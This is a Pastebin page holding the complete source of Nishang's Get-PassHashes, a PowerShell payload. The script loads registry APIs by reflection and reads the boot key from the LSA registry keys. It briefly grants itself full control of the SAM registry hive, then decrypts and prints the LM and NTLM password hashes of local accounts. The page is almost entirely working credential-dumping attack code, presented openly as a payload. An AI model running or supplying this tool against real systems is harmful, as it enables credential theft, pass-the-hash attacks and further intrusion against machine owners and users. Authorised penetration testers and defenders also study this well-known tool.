API tools faq
paste
Advertisement
Guest User

Untitled

a guest
Feb 11th, 2018
137
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 17.25 KB | None | 0 0
raw download clone embed print report
  1. function Get-PassHashes {
  2. <#
  3. .SYNOPSIS
  4. Nishang payload which dumps password hashes.
  5.  
  6. .DESCRIPTION
  7. The payload dumps password hashes using the modified powerdump script from MSF. Administrator privileges are required for this script
  8. (but not SYSTEM privs as for the original powerdump written by David Kennedy)
  9.  
  10. .EXAMPLE
  11. PS > Get-PassHashes
  12. Run above from an elevated shell.
  13.  
  14.  
  15. .EXAMPLE
  16. PS > Get-PassHashes -PSObjectFormat
  17. Use above to receive the hashes output as a PSObject.
  18.  
  19. .LINK
  20. http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html?showComment=1386725874167#c8513980725823764060
  21. https://github.com/samratashok/nishang
  22.  
  23. .Notes
  24. Reflection added by https://github.com/Zer1t0
  25.  
  26. #>
  27. [CmdletBinding()]
  28. Param (
  29. [Switch]$PSObjectFormat
  30. )
  31.  
  32. $script:PowerDump = $null
  33. function LoadApi
  34. {
  35. # https://blogs.technet.microsoft.com/heyscriptingguy/2013/06/27/use-powershell-to-interact-with-the-windows-api-part-3/
  36. $DynAssembly = New-Object System.Reflection.AssemblyName('Win32Lib')
  37. $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)
  38. $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('Win32Lib', $False)
  39. $TypeBuilder = $ModuleBuilder.DefineType('PowerDump', 'Public, Class')
  40.  
  41. #######################################################################
  42. # [DllImport("advapi32.dll", CharSet = CharSet.Auto)]
  43. # public static extern int RegOpenKeyEx(int hKey, string subKey, int ulOptions, int samDesired, out int hkResult);
  44. $PInvokeMethod = $TypeBuilder.DefineMethod(
  45. 'RegOpenKeyEx',
  46. [Reflection.MethodAttributes] 'Public, Static',
  47. [int],
  48. [Type[]] @( [int], [string], [int], [int], [int].MakeByRefType())
  49. )
  50.  
  51. $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
  52.  
  53. $FieldArray = [Reflection.FieldInfo[]] @(
  54. [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
  55. [Runtime.InteropServices.DllImportAttribute].GetField('CharSet')
  56. )
  57. $FieldValueArray = [Object[]] @(
  58. 'RegOpenKeyEx',
  59. [Runtime.InteropServices.CharSet]::Auto
  60. )
  61.  
  62. $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder(
  63. $DllImportConstructor,
  64. @('advapi32.dll'),
  65. $FieldArray,
  66. $FieldValueArray
  67. )
  68. $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
  69. ##########################################################################
  70. #[DllImport("advapi32.dll", EntryPoint="RegQueryInfoKey", CallingConvention=CallingConvention.Winapi, SetLastError=true)]
  71. #extern public static int RegQueryInfoKey(int hkey, StringBuilder lpClass, ref int lpcbClass, int lpReserved, out int lpcSubKeys, out int lpcbMaxSubKeyLen, out int lpcbMaxClassLen, out int lpcValues, out int lpcbMaxValueNameLen, out int lpcbMaxValueLen, out int lpcbSecurityDescriptor, IntPtr lpftLastWriteTime);
  72. $PInvokeMethod = $TypeBuilder.DefineMethod(
  73. 'RegQueryInfoKey',
  74. [Reflection.MethodAttributes] 'Public, Static',
  75. [int],
  76. [Type[]] @( [int], [Text.Stringbuilder], [int].MakeByRefType(), [int], [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [int].MakeByRefType(), [IntPtr])
  77. )
  78.  
  79. $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
  80.  
  81. $FieldArray = [Reflection.FieldInfo[]] @(
  82. [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
  83. [Runtime.InteropServices.DllImportAttribute].GetField('CallingConvention'),
  84. [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
  85. )
  86. $FieldValueArray = [Object[]] @(
  87. 'RegQueryInfoKey',
  88. [Runtime.InteropServices.CallingConvention]::Winapi,
  89. $true
  90. )
  91.  
  92. $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder(
  93. $DllImportConstructor,
  94. @('advapi32.dll'),
  95. $FieldArray,
  96. $FieldValueArray
  97. )
  98. $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
  99. ###############################################################################
  100. #[DllImport("advapi32.dll", SetLastError=true)]
  101. #public static extern int RegCloseKey(int hKey);
  102. $PInvokeMethod = $TypeBuilder.DefineMethod(
  103. 'RegCloseKey',
  104. [Reflection.MethodAttributes] 'Public, Static',
  105. [int],
  106. [Type[]] @( [int])
  107. )
  108.  
  109. $DllImportConstructor = [Runtime.InteropServices.DllImportAttribute].GetConstructor(@([String]))
  110.  
  111. $FieldArray = [Reflection.FieldInfo[]] @(
  112. [Runtime.InteropServices.DllImportAttribute].GetField('EntryPoint'),
  113. [Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')
  114. )
  115. $FieldValueArray = [Object[]] @(
  116. 'RegCloseKey',
  117. $true
  118. )
  119.  
  120. $SetLastErrorCustomAttribute = New-Object Reflection.Emit.CustomAttributeBuilder(
  121. $DllImportConstructor,
  122. @('advapi32.dll'),
  123. $FieldArray,
  124. $FieldValueArray
  125. )
  126. $PInvokeMethod.SetCustomAttribute($SetLastErrorCustomAttribute)
  127. ################################################################################
  128.  
  129. $script:PowerDump = $TypeBuilder.CreateType()
  130. }
  131.  
  132. #######################################powerdump written by David Kennedy#########################################
  133.  
  134. $antpassword = [Text.Encoding]::ASCII.GetBytes("NTPASSWORD`0");
  135. $almpassword = [Text.Encoding]::ASCII.GetBytes("LMPASSWORD`0");
  136. $empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee);
  137. $empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0);
  138. $odd_parity = @(
  139. 1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
  140. 16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
  141. 32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
  142. 49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
  143. 64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
  144. 81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
  145. 97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
  146. 112,112,115,115,117,117,118,118,121,121,122,122,124,124,127,127,
  147. 128,128,131,131,133,133,134,134,137,137,138,138,140,140,143,143,
  148. 145,145,146,146,148,148,151,151,152,152,155,155,157,157,158,158,
  149. 161,161,162,162,164,164,167,167,168,168,171,171,173,173,174,174,
  150. 176,176,179,179,181,181,182,182,185,185,186,186,188,188,191,191,
  151. 193,193,194,194,196,196,199,199,200,200,203,203,205,205,206,206,
  152. 208,208,211,211,213,213,214,214,217,217,218,218,220,220,223,223,
  153. 224,224,227,227,229,229,230,230,233,233,234,234,236,236,239,239,
  154. 241,241,242,242,244,244,247,247,248,248,251,251,253,253,254,254
  155. );
  156.  
  157. function sid_to_key($sid)
  158. {
  159. $c0 = $sid -band 255
  160. $c1 = ($sid -band 65280)/256
  161. $c2 = ($sid -band 16711680)/65536
  162. $c3 = ($sid -band 4278190080)/16777216
  163.  
  164. $s1 = @($c0, $c1, $c2, $c3, $c0, $c1, $c2)
  165. $s2 = @($c3, $c0, $c1, $c2, $c3, $c0, $c1)
  166.  
  167. return ,((str_to_key $s1),(str_to_key $s2))
  168. }
  169.  
  170. function str_to_key($s)
  171. {
  172. $k0 = [int][math]::Floor($s[0] * 0.5)
  173. $k1 = ( $($s[0] -band 0x01) * 64) -bor [int][math]::Floor($s[1] * 0.25)
  174. $k2 = ( $($s[1] -band 0x03) * 32) -bor [int][math]::Floor($s[2] * 0.125)
  175. $k3 = ( $($s[2] -band 0x07) * 16) -bor [int][math]::Floor($s[3] * 0.0625)
  176. $k4 = ( $($s[3] -band 0x0F) * 8) -bor [int][math]::Floor($s[4] * 0.03125)
  177. $k5 = ( $($s[4] -band 0x1F) * 4) -bor [int][math]::Floor($s[5] * 0.015625)
  178. $k6 = ( $($s[5] -band 0x3F) * 2) -bor [int][math]::Floor($s[6] * 0.0078125)
  179. $k7 = $($s[6] -band 0x7F)
  180.  
  181. $key = @($k0, $k1, $k2, $k3, $k4, $k5, $k6, $k7)
  182.  
  183. 0..7 | %{
  184. $key[$_] = $odd_parity[($key[$_] * 2)]
  185. }
  186.  
  187. return ,$key
  188. }
  189.  
  190. function NewRC4([byte[]]$key)
  191. {
  192. return new-object Object |
  193. Add-Member NoteProperty key $key -PassThru |
  194. Add-Member NoteProperty S $null -PassThru |
  195. Add-Member ScriptMethod init {
  196. if (-not $this.S)
  197. {
  198. [byte[]]$this.S = 0..255;
  199. 0..255 | % -begin{[long]$j=0;}{
  200. $j = ($j + $this.key[$($_ % $this.key.Length)] + $this.S[$_]) % $this.S.Length;
  201. $temp = $this.S[$_]; $this.S[$_] = $this.S[$j]; $this.S[$j] = $temp;
  202. }
  203. }
  204. } -PassThru |
  205. Add-Member ScriptMethod "encrypt" {
  206. $data = $args[0];
  207. $this.init();
  208. $outbuf = new-object byte[] $($data.Length);
  209. $S2 = $this.S[0..$this.S.Length];
  210. 0..$($data.Length-1) | % -begin{$i=0;$j=0;} {
  211. $i = ($i+1) % $S2.Length;
  212. $j = ($j + $S2[$i]) % $S2.Length;
  213. $temp = $S2[$i];$S2[$i] = $S2[$j];$S2[$j] = $temp;
  214. $a = $data[$_];
  215. $b = $S2[ $($S2[$i]+$S2[$j]) % $S2.Length ];
  216. $outbuf[$_] = ($a -bxor $b);
  217. }
  218. return ,$outbuf;
  219. } -PassThru
  220. }
  221.  
  222. function des_encrypt([byte[]]$data, [byte[]]$key)
  223. {
  224. return ,(des_transform $data $key $true)
  225. }
  226.  
  227. function des_decrypt([byte[]]$data, [byte[]]$key)
  228. {
  229. return ,(des_transform $data $key $false)
  230. }
  231.  
  232. function des_transform([byte[]]$data, [byte[]]$key, $doEncrypt)
  233. {
  234. $des = new-object Security.Cryptography.DESCryptoServiceProvider;
  235. $des.Mode = [Security.Cryptography.CipherMode]::ECB;
  236. $des.Padding = [Security.Cryptography.PaddingMode]::None;
  237. $des.Key = $key;
  238. $des.IV = $key;
  239. $transform = $null;
  240. if ($doEncrypt) {$transform = $des.CreateEncryptor();}
  241. else{$transform = $des.CreateDecryptor();}
  242. $result = $transform.TransformFinalBlock($data, 0, $data.Length);
  243. return ,$result;
  244. }
  245.  
  246. function Get-RegKeyClass([string]$key, [string]$subkey)
  247. {
  248. switch ($Key) {
  249. "HKCR" { $nKey = 0x80000000} #HK Classes Root
  250. "HKCU" { $nKey = 0x80000001} #HK Current User
  251. "HKLM" { $nKey = 0x80000002} #HK Local Machine
  252. "HKU" { $nKey = 0x80000003} #HK Users
  253. "HKCC" { $nKey = 0x80000005} #HK Current Config
  254. default {
  255. throw "Invalid Key. Use one of the following options HKCR, HKCU, HKLM, HKU, HKCC"
  256. }
  257. }
  258. $KEYQUERYVALUE = 0x1;
  259. $KEYREAD = 0x19;
  260. $KEYALLACCESS = 0x3F;
  261. $result = "";
  262. [int]$hkey=0
  263. if (-not $script:PowerDump::RegOpenKeyEx($nkey,$subkey,0,$KEYREAD,[ref]$hkey))
  264. {
  265. $classVal = New-Object Text.Stringbuilder 1024
  266. [int]$len = 1024
  267. if (-not $script:PowerDump::RegQueryInfoKey($hkey,$classVal,[ref]$len,0,[ref]$null,[ref]$null,
  268. [ref]$null,[ref]$null,[ref]$null,[ref]$null,[ref]$null,0))
  269. {
  270. $result = $classVal.ToString()
  271. }
  272. else
  273. {
  274. Write-Error "RegQueryInfoKey failed";
  275. }
  276. $script:PowerDump::RegCloseKey($hkey) | Out-Null
  277. }
  278. else
  279. {
  280. Write-Error "Cannot open key";
  281. }
  282. return $result;
  283. }
  284.  
  285. function Get-BootKey
  286. {
  287. $s = [string]::Join("",$("JD","Skew1","GBG","Data" | %{Get-RegKeyClass "HKLM" "SYSTEM\CurrentControlSet\Control\Lsa\$_"}));
  288. $b = new-object byte[] $($s.Length/2);
  289. 0..$($b.Length-1) | %{$b[$_] = [Convert]::ToByte($s.Substring($($_*2),2),16)}
  290. $b2 = new-object byte[] 16;
  291. 0x8, 0x5, 0x4, 0x2, 0xb, 0x9, 0xd, 0x3, 0x0, 0x6, 0x1, 0xc, 0xe, 0xa, 0xf, 0x7 | % -begin{$i=0;}{$b2[$i]=$b[$_];$i++}
  292. return ,$b2;
  293. }
  294.  
  295. function Get-HBootKey
  296. {
  297. param([byte[]]$bootkey);
  298. $aqwerty = [Text.Encoding]::ASCII.GetBytes("!@#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%`0");
  299. $anum = [Text.Encoding]::ASCII.GetBytes("0123456789012345678901234567890123456789`0");
  300. $k = Get-Item HKLM:\SAM\SAM\Domains\Account;
  301. if (-not $k) {return $null}
  302. [byte[]]$F = $k.GetValue("F");
  303. if (-not $F) {return $null}
  304. $rc4key = [Security.Cryptography.MD5]::Create().ComputeHash($F[0x70..0x7F] + $aqwerty + $bootkey + $anum);
  305. $rc4 = NewRC4 $rc4key;
  306. return ,($rc4.encrypt($F[0x80..0x9F]));
  307. }
  308.  
  309. function Get-UserName([byte[]]$V)
  310. {
  311. if (-not $V) {return $null};
  312. $offset = [BitConverter]::ToInt32($V[0x0c..0x0f],0) + 0xCC;
  313. $len = [BitConverter]::ToInt32($V[0x10..0x13],0);
  314. return [Text.Encoding]::Unicode.GetString($V, $offset, $len);
  315. }
  316.  
  317. function Get-UserHashes($u, [byte[]]$hbootkey)
  318. {
  319. [byte[]]$enc_lm_hash = $null; [byte[]]$enc_nt_hash = $null;
  320.  
  321. # check if hashes exist (if byte memory equals to 20, then we've got a hash)
  322. $LM_exists = $false;
  323. $NT_exists = $false;
  324. # LM header check
  325. if ($u.V[0xa0..0xa3] -eq 20)
  326. {
  327. $LM_exists = $true;
  328. }
  329. # NT header check
  330. elseif ($u.V[0xac..0xaf] -eq 20)
  331. {
  332. $NT_exists = $true;
  333. }
  334.  
  335. if ($LM_exists -eq $true)
  336. {
  337. $lm_hash_offset = $u.HashOffset + 4;
  338. $nt_hash_offset = $u.HashOffset + 8 + 0x10;
  339. $enc_lm_hash = $u.V[$($lm_hash_offset)..$($lm_hash_offset+0x0f)];
  340. $enc_nt_hash = $u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
  341. }
  342.  
  343. elseif ($NT_exists -eq $true)
  344. {
  345. $nt_hash_offset = $u.HashOffset + 8;
  346. $enc_nt_hash = [byte[]]$u.V[$($nt_hash_offset)..$($nt_hash_offset+0x0f)];
  347. }
  348. return ,(DecryptHashes $u.Rid $enc_lm_hash $enc_nt_hash $hbootkey);
  349. }
  350.  
  351. function DecryptHashes($rid, [byte[]]$enc_lm_hash, [byte[]]$enc_nt_hash, [byte[]]$hbootkey)
  352. {
  353. [byte[]]$lmhash = $empty_lm; [byte[]]$nthash=$empty_nt;
  354. # LM Hash
  355. if ($enc_lm_hash)
  356. {
  357. $lmhash = DecryptSingleHash $rid $hbootkey $enc_lm_hash $almpassword;
  358. }
  359.  
  360. # NT Hash
  361. if ($enc_nt_hash)
  362. {
  363. $nthash = DecryptSingleHash $rid $hbootkey $enc_nt_hash $antpassword;
  364. }
  365.  
  366. return ,($lmhash,$nthash)
  367. }
  368.  
  369. function DecryptSingleHash($rid,[byte[]]$hbootkey,[byte[]]$enc_hash,[byte[]]$lmntstr)
  370. {
  371. $deskeys = sid_to_key $rid;
  372. $md5 = [Security.Cryptography.MD5]::Create();
  373. $rc4_key = $md5.ComputeHash($hbootkey[0..0x0f] + [BitConverter]::GetBytes($rid) + $lmntstr);
  374. $rc4 = NewRC4 $rc4_key;
  375. $obfkey = $rc4.encrypt($enc_hash);
  376. $hash = (des_decrypt $obfkey[0..7] $deskeys[0]) +
  377. (des_decrypt $obfkey[8..$($obfkey.Length - 1)] $deskeys[1]);
  378. return ,$hash;
  379. }
  380.  
  381. function Get-UserKeys
  382. {
  383. ls HKLM:\SAM\SAM\Domains\Account\Users |
  384. where {$_.PSChildName -match "^[0-9A-Fa-f]{8}$"} |
  385. Add-Member AliasProperty KeyName PSChildName -PassThru |
  386. Add-Member ScriptProperty Rid {[Convert]::ToInt32($this.PSChildName, 16)} -PassThru |
  387. Add-Member ScriptProperty V {[byte[]]($this.GetValue("V"))} -PassThru |
  388. Add-Member ScriptProperty UserName {Get-UserName($this.GetValue("V"))} -PassThru |
  389. Add-Member ScriptProperty HashOffset {[BitConverter]::ToUInt32($this.GetValue("V")[0x9c..0x9f],0) + 0xCC} -PassThru
  390. }
  391.  
  392. function DumpHashes
  393. {
  394. LoadApi
  395. $bootkey = Get-BootKey;
  396. $hbootKey = Get-HBootKey $bootkey;
  397. Get-UserKeys | %{
  398. $hashes = Get-UserHashes $_ $hBootKey;
  399. if($PSObjectFormat)
  400. {
  401. $creds = New-Object psobject
  402. $creds | Add-Member -MemberType NoteProperty -Name Name -Value $_.Username
  403. $creds | Add-Member -MemberType NoteProperty -Name id -Value $_.Rid
  404. $creds | Add-Member -MemberType NoteProperty -Name lm -Value ([BitConverter]::ToString($hashes[0])).Replace("-","").ToLower()
  405. $creds | Add-Member -MemberType NoteProperty -Name ntlm -Value ([BitConverter]::ToString($hashes[1])).Replace("-","").ToLower()
  406. $creds
  407. }
  408. else
  409. {
  410. "{0}:{1}:{2}:{3}:::" -f ($_.UserName,$_.Rid,
  411. [BitConverter]::ToString($hashes[0]).Replace("-","").ToLower(),
  412. [BitConverter]::ToString($hashes[1]).Replace("-","").ToLower());
  413. }
  414. }
  415. }
  416.  
  417. #http://www.labofapenetrationtester.com/2013/05/poshing-hashes-part-2.html?showComment=1386725874167#c8513980725823764060
  418. if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator"))
  419. {
  420. Write-Warning "Script requires elevated or administrative privileges."
  421. Return
  422. }
  423. else
  424. {
  425. #Set permissions for the current user.
  426. $rule = New-Object System.Security.AccessControl.RegistryAccessRule (
  427. [System.Security.Principal.WindowsIdentity]::GetCurrent().Name,
  428. "FullControl",
  429. [System.Security.AccessControl.InheritanceFlags]"ObjectInherit,ContainerInherit",
  430. [System.Security.AccessControl.PropagationFlags]"None",
  431. [System.Security.AccessControl.AccessControlType]"Allow")
  432. $key = [Microsoft.Win32.Registry]::LocalMachine.OpenSubKey(
  433. "SAM\SAM\Domains",
  434. [Microsoft.Win32.RegistryKeyPermissionCheck]::ReadWriteSubTree,
  435. [System.Security.AccessControl.RegistryRights]::ChangePermissions)
  436. $acl = $key.GetAccessControl()
  437. $acl.SetAccessRule($rule)
  438. $key.SetAccessControl($acl)
  439.  
  440. DumpHashes
  441.  
  442. #Remove the permissions added above.
  443. $user = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
  444. $acl.Access | where {$_.IdentityReference.Value -eq $user} | %{$acl.RemoveAccessRule($_)} | Out-Null
  445. Set-Acl HKLM:\SAM\SAM\Domains $acl
  446.  
  447. }
  448. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!